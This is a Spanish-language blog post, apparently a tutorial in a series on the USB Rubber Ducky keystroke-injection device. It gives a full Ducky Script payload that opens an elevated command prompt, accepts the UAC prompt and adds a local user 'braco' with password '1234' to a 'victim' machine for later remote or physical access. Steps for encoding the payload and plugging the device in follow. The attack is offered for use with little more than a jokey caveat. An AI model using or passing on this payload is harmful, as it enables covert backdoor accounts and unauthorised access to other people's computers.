Hola a tod@s
Hoy traemos el segundo capítulo de la cadena de artículos sobre Rubber Ducky. En el primer capítulo creamos un sencillo payload, simplemente el compañero se dejaba el PC sin bloquear y le dejábamos un bonito mensaje en un txt en su desktop.
Para este segundo capítulo queríamos darle un giro más de tuerca y crear un payload un poco más sofisticado. Con este payload podremos crearnos una cuenta de usuario en la máquina víctima y entrar más tarde, ya sea por acceso remoto, o bien con acceso físico, ;)
A continuación el código necesario para crear este payload:
- REM addlocaluser
- DELAY 5000
- GUI r
- DELAY 50
- STRING powershell Start-Process cmd -verb runas
- ENTER
- DELAY 200
- ENTER
- DELAY 200
- STRING net user braco 1234 /add
- ENTER
- DELAY 200
- STRING exit
- ENTER
La utilización de Rubber Ducky es sencilla, se puede enumerar en los siguientes pasos:
- Primer paso será crear el payload en un archivo de texto.
- Segundo paso será encodear el archivo de texto.
- Tercer paso será cargar el binario creado en la tarjeta de memoria de Rubber Ducky.
- Cuarto paso pinchar el Rubber Ducky en el PC víctima.
Como una imagen vale más que mil palabras, os dejo con el video, recordad que estos videos estarán disponibles en nuestro Canal de Youtube o en próximos artículos, no olvidéis suscribiros al canal de Youtube, así como feed y demás redes sociales para estar al tanto de las novedades .
No seáis malos.
PD: Este artículo no habría sido posible sin la inestimable colaboración de @kioardetroya
PD: Este artículo no habría sido posible sin la inestimable colaboración de @kioardetroya